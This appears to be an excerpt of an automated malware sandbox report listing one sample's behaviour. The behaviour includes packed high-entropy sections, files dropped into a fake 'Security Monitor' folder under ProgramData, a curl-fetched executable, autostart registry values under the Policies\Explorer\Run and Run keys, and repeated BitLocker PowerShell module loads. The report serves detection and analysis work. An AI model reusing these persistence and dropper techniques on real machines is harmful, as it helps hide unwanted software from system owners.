Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033E51C8 push 033E51F4h; ret	53_2_033E51EC
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033F4038 push 033F4070h; ret	53_2_033F4068

Source: [space]= .exe.5.dr	Static PE information: section name: .text entropy: 7.81759162350406
Source: is-JF90R.tmp.19.dr	Static PE information: section name: entropy: 7.970560832581065
Source: is-JF90R.tmp.19.dr	Static PE information: section name: entropy: 7.995359849273399
Source: is-JF90R.tmp.19.dr	Static PE information: section name: entropy: 7.98989686324796
Source: is-JF90R.tmp.19.dr	Static PE information: section name: entropy: 7.581553890924904
Source: is-JF90R.tmp.19.dr	Static PE information: section name: entropy: 7.998441689187187
Source: is-JF90R.tmp.19.dr	Static PE information: section name: .d entropy: 7.923610064617086
Source: is-9ATRT.tmp.19.dr	Static PE information: section name: entropy: 7.972249623981622
Source: is-9ATRT.tmp.19.dr	Static PE information: section name: entropy: 7.99458999281375
Source: is-9ATRT.tmp.19.dr	Static PE information: section name: entropy: 7.992015849394924
Source: is-9ATRT.tmp.19.dr	Static PE information: section name: entropy: 7.515192733866904
Source: is-9ATRT.tmp.19.dr	Static PE information: section name: entropy: 7.998936896615619
Source: is-9ATRT.tmp.19.dr	Static PE information: section name: .rsrc entropy: 7.953583660494071
Source: is-9ATRT.tmp.19.dr	Static PE information: section name: .data entropy: 7.561972396742998

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ssleay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-IFJUI.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\WebBrowser.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-ASDJS.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-V94IU.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sqlite3.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-P60MT.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-269PL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-3JAMQ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\webbrowser.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe	File created: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-632MH.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lame_enc.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-JF90R.tmp	Jump to dropped file
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File created: C:\ProgramData\Security Monitor\{WCS1080F-FD66-4650-B1B8-C8310A1CE2D3}\ffws.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\curl.exe	File created: C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-EI053.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ff.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-OO1B8.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\libeay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-ILFVG.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Windows\System32\curl.exe	File created: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-9ATRT.tmp	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ssleay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-IFJUI.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\WebBrowser.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-ASDJS.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-V94IU.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sqlite3.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-P60MT.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-269PL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-3JAMQ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-632MH.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lame_enc.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-JF90R.tmp	Jump to dropped file
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File created: C:\ProgramData\Security Monitor\{WCS1080F-FD66-4650-B1B8-C8310A1CE2D3}\ffws.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-EI053.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ff.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-OO1B8.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\libeay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-ILFVG.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-9ATRT.tmp	Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localSPM
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localSPM
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localSPM
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localSPM
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localmon
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localmon
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localmon
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localmon

Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run kbdsprt
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run kbdsprt
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run localSPM
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run localSPM

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
